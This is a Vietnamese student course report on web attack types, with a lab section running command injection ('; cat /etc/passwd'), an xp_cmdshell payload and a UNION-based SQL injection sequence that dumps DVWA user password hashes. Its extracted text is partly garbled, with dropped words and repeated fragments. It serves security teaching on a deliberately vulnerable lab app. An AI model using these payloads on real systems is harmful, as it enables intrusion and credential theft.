Theo khảo sát, hơn 90% các ứng dụng web và website tồn tại các lỗ hổng an ninh, khoảng 75% các cuộc tấn công mạng được thực hiện thông qua ứng dụng web hoặc thông qua website. Các trang web mục tiêu không bị ảnh hưởng trực tiếp bởi các cuộc tấn công làm cho các cuộc tấn công khó có thể bị phát hiện và cảnh báo. Theo Imperva, chiến dịch đang tiếp diễn và các hacker đang tiếp tục tìm kiếm và nhắm vào các website có nhiều lỗ hỗng. Trong tháng 2 – 2016, hacker đã đột nhập vào trang web chính thức của Linux Mint và âm thầm cài backdoor của họ vào các bản phiên bản của hệ điều hành cho hàng ngàn người sử dụng mà không hề hay biết. Vào tháng 10 – 2015, hacker đã chiếm hữu hàng ngàn website được xây dựng bởi nền tảng thương mại điện tử Magento eBay thông qua lỗ hổng zeroday và lạm dụng chúng để phân phối các phần mềm độc hại đến người dùng. Hầu hết các công ty đã đảm bảo dữ liệu của họ ở mức độ mạng, nhưng đã bỏ qua các bước quan trọng của việc bảo đảm các ứng dụng web. Website hoàn toàn không được bảo vệ bởi tường lửa và do đó dễ dàng làm mồi cho những kẻ tấn công.
TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT TPHCM KHOA CÔNG NGHỆ THÔNG TIN BÀI BÁO CÁO MÔN HỌC AN NINH MẠNG TÌM HIỂU VÀ THỰC NGHIỆM VỀ CÁC DẠNG TẤN CÔNG WEBSITE Giảng viên hướng dẫn: Th.S Nguyễn Thị Thanh Vân Nhóm thực hiện: - Nguyễn Trường Hận 14110054 - Trần Thị Ngọc Anh 14110003 TP.Hồ Chí Minh, tháng 12 năm 2017 MỤC LỤC DANH SÁCH HÌNH ẢNH Error! Bookmark not defined CÁC THUẬT NGỮ, TỪ VIẾT TẮT Error! Bookmark not defined PHẦN LÝ THUYẾT Chương 1: Giới thiệu công website 1.1 Tổng quan bảo mật web (Web security) 1.2 Cách công website Chương 2: Các dạng công web 2.1 SQL Injection 2.2 Cross-Site Request Forgery (CSRF) 2.3 Cross-Site Scripting (XSS) 2.4 Tấn công từ chối dịch vụ (DDOS) 11 2.5 File Inclusion 12 Chương 3: Công cụ triển khai dạng công web 14 3.1 Damn Vulnerable Web Application 14 PHẦN THỰC NGHIỆM 15 PHẦN LÝ THUYẾT Chương 1: Giới thiệu công website 1.1 Tổng quan bảo mật web (Web security) Hiện nay, bảo mật thông tin thách thức lớn đổi với nhà nghiên cứu chuyên gia ngành, lỗ hổng phương thức khai thác lỗ hổng ngày phức tạp tinh vi Theo khảo sát, 90% ứng dụng web website tồn lỗ hổng an ninh, khoảng 75% công mạng thực thông qua ứng dụng web thông qua website Các trang web mục tiêu không bị ảnh hưởng trực tiếp công làm cho cơng khó bị phát cảnh báo Theo Imperva, chiến dịch tiếp diễn hacker tiếp tục tìm kiếm nhắm vào website có nhiều lỗ hỗng Trong tháng – 2016, hacker đột nhập vào trang web thức Linux Mint âm thầm cài backdoor họ vào phiên hệ điều hành cho hàng ngàn người sử dụng mà không hay biết Vào tháng 10 – 2015, hacker chiếm hữu hàng ngàn website xây dựng tảng thương mại điện tử Magento eBay thông qua lỗ hổng zero-day lạm dụng chúng để phân phối phần mềm độc hại đến người dùng Hầu hết công ty đảm bảo liệu họ mức độ mạng, bỏ qua bước quan trọng việc bảo đảm ứng dụng web Website hồn tồn khơng bảo vệ tường lửa dễ dàng làm mồi cho kẻ công 1.2 Lỗ hổng bảo mật 1.2.1 Lỗ hổng bảo mật Lỗ hổng bảo mật điểm yếu website, gây do: lỗi cấu hình, phân quyền cho website, lỗi lập trình người lập trình, lỗi nằm hệ thống, thành phần tích hợp Tin tặc lợi dụng lỗ hổng để khai thác cơng phá hoại website Lỗ hổng bảo mật khó để nhận biết ngay, cần thực chuyên gia hàng đầu 1.2.2 Phân loại lỗ hổng bảo mật Có nhiều tổ chức khác tiến hành phân loại dạng lỗ hổng đặc biêt Theo cách phân loại Bộ quốc phòng Mỹ, loại lỗ hổng bảo mật hệ thống chia sau: • Lỗ hổng loại C: lỗ hổng loại cho phép thực phương thức công theo DoS (Dinal of Services – Từ chối dịch vụ) Mức độ nguy hiểm thấp, ảnh hưởng tới chất lượng dịch vụ, làm ngưng trệ, gián đoạn hệ thống; không làm phá hỏng liệu đạt quyền truy nhập bất hợp pháp • Lổ hổng loại B: Các lỗ hổng cho phép người sử dụng có thêm quyền hệ thống mà không cần thực kiểm tra tính hợp lệ Mức độ nguy hiểm trung bình; Những lỗ hổng thường có ứng dụng hệ thống; dẫn đến lộ thơng tin u cầu bảo mật • Lỗ hổng loại A: Các lỗ hổng cho phép người sử dụng ngồi truy nhập vào hệ thống bất hợp pháp Lỗ hổng nguy hiểm, làm phá hủy toàn hệ thống Dự án mở an ninh ứng dụng web OWASP phân loại 10 lỗ hổng ứng dụng web phổ biến nguy hiểm gồm: • A1- Nhúng mã (Injection) • A2- Xác thực hay quản lý phiên thiếu xác • A3- Thực thi mã Script xấu (XSS) • A4- Đối tƣợng tham chiếu khơng an tồn • A5- Sai sót cấu hình an ninh • A6- Lộ liệu nhạy cảm • A7- Điều khiển truy cập mức chức khơng an tồn • A8- Tấn cơng giả mạo (CSRF) • A9- Sử dụng thành phần chứa lỗ hổng cơng khai • A10- Chuyển huớng chuyển tiếp khơng an tồn 1.3 Cách cơng website Với hacker, q trình cơng mục tiêu khái qt giai đoạn: • Giai đoạn 1: Thu thập thơng tin • Giai đoạn 2: Phân tích hành động • Giai đoạn 3: Dừng xóa dấu vết Ở tập trung vào phân tích giai đoạn giai đoạn • Giai đoạn 1: Khảo sát ứng ứng dụng Web • Gai đoạn 2: Tấn công mục tiêu 1.3.1 Giai đoạn 1: Khảo sát ứng ứng Web Tiến hành thu thập thông tin mức hạ tầng mục tiêu: Thu thập số thông tin quan trọng có server, mơ hình Web server, client tương tác với ứng dụng Web, kiểu giao tiếp thông tin (stranport) thông qua cổng (port) nào, site liên quan đến việc thực chức site mục tiêu Tiếp khảo sát ứng dụng Web: Một phương pháp khảo sát phổ biến, xem mã nguồn lợi dụng lỗi cho phép xem mã nguồn ngôn ngữ Web Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP) Sử dụng số phép thử thêm dấu ‘ vào url theo khuôn dạng truyền vào giá trị phổ biến, đưa vào mẫu thử cở form xác thực đăng nhập để khảo sát lỗi SQL Injection ▪ Đưa vào thông tin “lạ” form ứng dụng Web hay url để xem thông điệp chuyển xuống cho người dùng ứng dụng có lỗi Các thơng báo lỗi thường tiết lộ chi tiết kỹ thuật, dựa vào biết điểm yếu hệ thống ▪ Sử dụng công cụ để đưa trang Web mục tiêu vào tìm lỗi người phát triển ứng dụng để từ đố xây dựng nên kịch cơng chọn cách cơng cụ thể ▪ Tìm hiểu sâu chức ứng dụng Web Tìm hiểu thực phần ứng dụng, đặc biệt order input, confimation, order tracking ▪ Tìm hiểu luồng di chuyển thơng tin Các thông tin tương tác client server, thông tin trương tác với database Hiện việc viết mã để thực việc giao tiếp thông tin thường phải đảm bảo tính hiệu (nhanh) bảo mật (có thể chậm hơn) Thường tính hiệu ưu tiên phát sinh lỗi, hacker lợi dụng lỗi để đoạt quyền điều khiển hệ thống 1.3.2 Giai đoạn 2: Tấn công mục tiêu Việc thu thập thông vấn đề quan trọng cho việc công vào hệ thống máy mục tiêu Cho dù hacker công theo phương diện phần cứng hay qua ứng dụng việc thu thâp cần thiết Sau khảo sát thu thập thông tin mục tiêu, hacker bắt đầu thực công nhằm xâm nhập vào hệ thống lấy thông tin, đưa thông tin xấu vào, dành quyền kiểm sốt Có thể khơng cần phải theo thứ tự hay qua hết bước này, việc nắm rõ thông tin máy mục tiêu điều kiện tiên để dẫn đến thành công việc công Tùy vào thông tin thu thập mà hacker địnnh công theo kỹ thuật nào, xây dựng kịch công phù hợp Một số kịch công: ▪ Tấn công đồng loạt trang thông tin điện tử, làm thay đổi nội dung, đưa thông tin sai lệch ▪ Tấn công vào ứng dụng Web mua bán, giao dịch để đánh cấp thơng tin cá nhân, thẻ tín dụng ▪ Tấn công ứng dụng Web, đặt mã độc trang Web, sử dụng máy chủ bị lỗi để thực hành vi cơng khác Mục đích cơng Web: ▪ Mục đích trị: cơng trang thuộc phủ, thành phố, ban ngành ▪ Mục đích lợi nhuận: trang thương mại điện tử, tài chính, ngân hàng ▪ Mục đích cá nhân Nếu không thành công việc xâm nhập kỹ thuật phổ biến, Dos cách thức mà hacker thường lựa chọn để làm cho hệ thống khơng thể hoạt động Do đó, việc bảo mật cho mọt hệ thống cần đòi hỏi kết hợp không riêng nhà quản trị hệ thống mà nhà thiết kế ứng dụng hợp tác khách hàng thường sử dụng Chương 2: Các dạng công web 2.1 SQL Injection SQL injection kỹ thuật cho phép kẻ công lợi dụng lỗ hổng việc kiểm tra liệu đầu vào ứng dụng web thông báo lỗi hệ quản trị sở liệu trả để inject (tiêm vào) thi hành câu lệnh SQL bất hợp pháp SQL injection cho phép kẻ công thực thao tác, delete, insert, update, v.v Trên sở liệu ứng dụng, chí server mà ứng dụng chạy SQL injection thường biết đến vật trung gian công ứng dụng web có liệu quản lý hệ quản trị sở liệu SQL Server, MySQL, Oracle, DB2, Sysbase Một số dạng công thường gặp với ứng dụng web 2.1.1 Dạng công vượt qua kiểm tra lúc đăng nhập Với dạng cơng này, tin tặc dễ dàng vượt qua trang đăng nhập nhờ vào lỗi dùng câu lệnh SQL thao tác sở liệu ứng dụng web Thông thường phép người dùng truy cập vào trang web bảo mật, hệ thống thường xây dựng trang đăng nhập để yêu cầu người dùng nhập thông tin tên đăng nhập mật Sau người dùng nhập thông tin vào, hệ thống kiểm tra tên đăng nhập mật có hợp lệ hay khơng để định cho phép hay từ chối thực tiếp 2.1.2 Dạng công sử dụng câu lệnh SELECT Dạng công phức tạp Để thực kiểu cơng này, kẻ cơng phải có khả hiểu lợi dụng sơ hở thông báo lỗi từ hệ thống để dò tìm điểm yếu khởi đầu cho việc cơng Ví dụ, trang tìm kiếm Các trang cho phép người dùng nhập vào thơng tin tìm kiếm Họ, Tên, … 2.1.3 Dạng công sử dụng câu lệnh INSERT Thông thường ứng dụng web cho phép người dùng đăng ký tài khoản để tham gia Chức thiếu sau đăng ký thành cơng, người dùng xem hiệu chỉnh thơng tin SQL injection dùng hệ thống khơng kiểm tra tính hợp lệ thơng tin nhập vào 2.1.4 Dạng công sử dụng stored-procedures Việc công stored-procedures gây tác hại lớn ứng dụng thực thi với quyền quản trị hệ thống 'sa' Ví dụ, ta thay đoạn mã tiêm vào dạng: '; EXEC xp_cmdshell ‘cmdd.exe dir C: ' Lúc hệ thống thực lệnh liệt kê thư mục ổ đĩa C:\ cài đặt server Việc phá hoại kiểu tuỳ thuộc vào câu lệnh đằng sau cmd.exe 2.2 Cross-Site Request Forgery (CSRF) Cross-site Request Forgery (CSRF), XSRF nói đến việc cơng vào chứng thực request web thông qua việc sử dụng Cookies, nơi mà hacker có khả sử dụng thủ thuật để tạo request mà bạn khơng biết Vì vậy, CSRF hacker lạm dụng tin tưởng ứng dụng web trình duyệt nạn nhân CSRF kiểu công gây nhầm lẫn tăng tính xác thực cấp quyền nạn nhân gửi request giả mạo đến máy chủ Vì lỗ hổng CSRF ảnh hưởng đến quyền người dùng ví dụ quản trị viên, kết chúng truy cập đầy đủ quyền Trong cơng CSRF trình duyệt nạn nhân bị lừa để gửi request đến ứng dụng web theo mong muốn kẻ công, thông thường, ví dụ yêu cầu gửi lên để thay đổi vài liệu phía server Khi gửi request HTTP (hợp pháp cách khác), trình duyệt nận nhân bao gồm tiêu đề cookie Các cookie thường dùng để lưu trữ session để định danh người dùng xác thực lại cho yêu cầu gửi lên, điều hiển nhiên không thực tế Nếu phiên làm việc xác thực nạn nhân lưu trữ Cookie hiệu lực (một cửa sổ trình duyệt không thiết phải mở), ứng dụng dễ bị cơng CSRF, kẻ cơng thử dụng CSRF để chay yêu cầu với trang web mà trang web phân biệt request hợp pháp hay không 2.3 Cross-Site Scripting (XSS) XSS kiểu công cho phép hacker chèn đoạn script độc hại vào website ,và chúng thực thi người dùng(trên trình duyệt người dùng).Khi trình duyệt victims thực thi đoạn script độc hại đó,chúng gửi cho hacker thơng tin victims qua email server Phân loại: Có loại Reflected XSS, Stored XSS DOM-based XSS 2.3.1 Reflected XSS (Non-Persistent) Reflected XSS dạng công thường gặp loại hình XSS Với Reflected XSS, hacker không gửi liệu độc hại lên server nạn nhân mà gửi trực tiếp link có chứa mã độc cho người dùng, người dùng click vào link trang web load chung với đoạn script độc hại Reflected XSS thường dùng để ăn cắp cookie, chiếm session, … nạn nhân cài keylogger, trojan,… vào máy tính nạn nhân Như hình ta thấy, nạn nhân đăng nhập vào ứng dụng web, attacker gửi thẳng URL để khai thác thông tin tới nạn nhân, nạn nhân truy cập URL attacker tới server sau nhận phản hồi từ server kèm với đoạn mã độc attacker Khi đoạn mã độc thực thi trình duyệt nạn nhân, session người dùng gửi tới attacker Attacker dựa vào thông tin nhận session để chiếm quyền giả mạo nạn nhân 2.3.2 Stored XSS (Persistent XSS) Stored XSS dạng công mà hacker chèn trực tiếp mã độc vào sở liệu website Dạng công xảy liệu gửi lên server không kiểm tra kỹ lưỡng mà lưu trực tiếp vào sở liệu Khi người dùng truy cập vào trang web đoạn script độc hại thực thi chung với trình load trang web Như hình ta thấy, attacker tiến hành gửi tới server nội dung kèm mã độc, nạn nhân đăng nhập truy cập vào nội dung chứa mã độc server phản hồi kèm với mã độc hacker, nạn nhân nhận phản hồi server tiến hành thực thi trình duyệt gửi phiên làm việc tới attacker Từ hacker có thơng tin tên đăng nhập, password, … chiếm session nạn nhân 2.3.3 DOM-based XSS DOM-based XSS dạng công XXS làm thay đổi cấu trúc cảu trang web cách thay đổi cấu trúc HTML Đối với dạng công này, hacker chèn đoạn script nhằm làm thay đổi giao diện mặc định trang web thành giao diện giả, ví dụ tạo form đăng nhập giả dụ người dùng đăng nhập để chiếm mật họ DOM-based XSS biến thể Persistent XSS Non-Persistent XSS Như hình ta thấy rằng, nạn nhân đăng nhập vào ứng dụng web, attacker gửi tới nạn nhân URL chữa đoạn javaScript, nạn nhân gửi yêu cầu truy cập tới server nhận phản hồi từ server trang web chữa mã attacker Khi trình duyệt sử lí phản hồi từ server, trình duyệt gửi thơng tin session cho attacker từ attacker chiếm session nạn nhân 2.4 Tấn công từ chối dịch vụ (DDOS) Tấn công từ chối dịch vụ phân tán (DDoS - Distributed Denial Of Service) kiểu công làm cho hệ thống máy tính hay hệ thống mạng tải, cung cấp dịch vụ phải dừng hoạt động Trong công DDoS, máy chủ dịch vụ bị "ngập" hàng loạt lệnh truy cập từ lượng kết nối khổng lồ Khi số lệnh truy cập lớn, máy chủ tải khơng khả xử lý u cầu Hậu người dùng truy cập vào dịch vụ trang web bị công DdoS 2.5 File Inclusion File inclusion attack kỹ thuật khai thác dựa lỗi include file PHP, chia thành loại: • Local file inclusion Là kỹ thuật chèn file local vào hệ thống, khai thác lỗi Hcker xem nhiều thông tin server victim file: passwd, http.còn, php.ini, access_log … tùy theo mức độ bảo mật server • Remote file inclusion Là lỗi mà attacker chèn đoạn mã độc chúng (như file uploader hay shells) vào webpage nạn nhân Web server webpage hiểu hiển thị theo đoạn script mà attacker chèn vào Khi attacker kiểm sốt server Trong lập trình PHP có lệnh include, require, require _ once, include _ once cho phép file gọi đến file khác Tùy thuộc vào mức độ bảo mật server, kẻ công include file máy chủ (include local) hay include đến file máy khác (include remote) Mục đích kẻ cơng chạy hàm hệ thống thu thập thông tin nhạy cảm hệ thống Tất công việc kẻ cơng đạt chạy web shell (hay gọi web hack tool) c99shell, r57shell, … 2.6 Command Injection Command Injection xuất nội dung website, có cung cấp chức cụ thể thực thi câu lệnh hệ thống nhằm mục đích phục vụ người dùng đầu cuối Tấn cơng command injection khả chèn nội dung câu lệnh hệ thống vào phần input ứng dụng thực thi câu lệnh ngồi phạm vi kiểm sốt ứng dụng từ kẻ xấu công lỗ hổng command injection ứng dụng web Chương 3: Công cụ triển khai dạng công web 3.1 Damn Vulnerable Web Application Damn Vulnerable Web Application (DVWA) ứng dụng mã nguồn PHP/MySQL tập hợp sẵn lỗi logic bảo mật ứng dụng web mã nguồn PHP Lỗi logic lập trình áp dụng loại ngơn ngữ lập trình nhằm giảm thiểu khả tạo lổ hổng bảo mật từ tư lập trình chưa cẩn thận Mục tiêu DVWA tạo mơi trường thực hành pentest hợp pháp Giúp cho nhà phát triển ứng dụng web hiểu hoạt động lập trình an tồn bảo mật Bên cạnh DVWA cung cấp cho pentester phương pháp học thực hành công khai thác lỗi bảo mật ứng dụng web mức nâng cao DVWA có nhóm lổ hổng bảo mật sau: • • • • • • • • Brute Force Command Execution Cross Site Request Forgery (CSRF) File Inclusion SQL Injection Insecure File Upload Cross Site Scripting (XSS) Easter eggs Các mức độ bảo mật DVWA: DVWA cung cấp mức độ bảo mật tương ứng level để bạn thực hành từ dễ khó gồm : • High - mức cao nhất: Level gần level dùng để so sánh mã nguồn có lổ hổng mức low medium với mã nguồn tối ưu mức an tồn bảo mật • Medium - mức trung bình: Mức độ cung cấp nội dung logic code fix lổ hổng hạng mục mức low • Low - mức độ thấp nhất: Với mức độ low mã nguồn PHP gân phơi bày khả khai thác lổ hổng qua tư lập trình chưa bao quát vấn đề bảo mật Đối với trang thực hành bảo mật có nút view source Nút sử dụng để xem nội dung source code mức bảo mật ứng mổi hạng mục, để từ bạn so sánh, đánh giá lý mã nguồn lại phơi bày lổ hổng bảo mật PHẦN THỰC NGHIỆM Mô tả, yêu cầu Máy server: Kali Linux 64 bit Mơ hình hệ thống Thực nghiệm Sau cài đặt xong dvwa có giao diện sau: 3.1 Command injection Bước 1: Cài đặt DVWA security mức “low” Bước 2: Ở mục command injection, server thực người dùng nhập vào địa ip Nhập vào Enter an IP address: 8.8.4.4 nhấn submit cho kết hình: Trong trường hợp attacker muốn xem file etc/passwd server Bước 3: Nhập vào trường Enter an IP address: cat /etc/passwd server khơng hiển thị thơng tin Bước 4: Nhập vào trường Enter an IP address: 8.8.4.4 ; cat /etc/passwd, Server hiển thị file etc/passwd 3.2 SQL Injection B1: Ở mục SQL injection, server thực người dùng nhập vào UserID, trường hợp UserID nằm từ 1→5 Trong trường hợp attacker muốn đọc liệu database B2:Kiểm tra số cột tồn database, nhập vào trường User ID: 3' order by # 3' order by # Khi nhập vào trường User ID: 3' order by # Server báo lỗi! Kết luận: Database có cột B3: Truy xuất thông tin databasem, nhập vào trường User ID: 3' union all select 1,database()# để xem tên database là: dvwa Nhập vào trường User ID: 3' union all select version(),user()# để xem version database là: 10.1.26-MariaDB-1 user database là: dvwa_admin B4: Liệt kê danh sách bảng có database, nhập vào trường User ID: 3' union all select 1,table_name from information_schema.tables # B5: Liệt kê cột bảng “users”, nhập vào trường User ID: 3' union all select 1,group_concat(column_name) from information_schema.columns where table_name='users'# B6: Truy xuất username password bảng user, nhập vào trường User ID: 3' union all select 1,group_concat(user,password) from users # Kết cho chuỗi: admin5f4dcc3b5aa765d61d8327deb882cf99,gordonbe99a18c428cb38d5f2608 53678922e03,13378d3533d75ae2c3966d7e0d4fcc69216b,pablo0d107d09f5bb e40cade3de5c71e9e9b7,smithy5f4dcc3b5aa765d61d8327deb882cf99 Kết luận: Username Password Admin 5f4dcc3b5aa765d61d8327deb882cf99 Gordonb e99a18c428cb38d5f260853678922e03 1337 8d3533d75ae2c3966d7e0d4fcc69216b Pablo pablo0d107d09f5bbe40cade3de5c71e9e9b7 smithy 5f4dcc3b5aa765d61d8327deb882cf99 3.3 CSRF ... nên kịch công chọn cách cơng cụ thể ▪ Tìm hiểu sâu chức ứng dụng Web Tìm hiểu thực phần ứng dụng, đặc biệt order input, confimation, order tracking ▪ Tìm hiểu luồng di chuyển thông tin Các thông... phép hay từ chối thực tiếp 2.1.2 Dạng công sử dụng câu lệnh SELECT Dạng công phức tạp Để thực kiểu công này, kẻ cơng phải có khả hiểu lợi dụng sơ hở thông báo lỗi từ hệ thống để dò tìm điểm yếu khởi... điều kiện tiên để dẫn đến thành công việc công Tùy vào thông tin thu thập mà hacker địnnh công theo kỹ thuật nào, xây dựng kịch công phù hợp Một số kịch công: ▪ Tấn công đồng loạt trang thông tin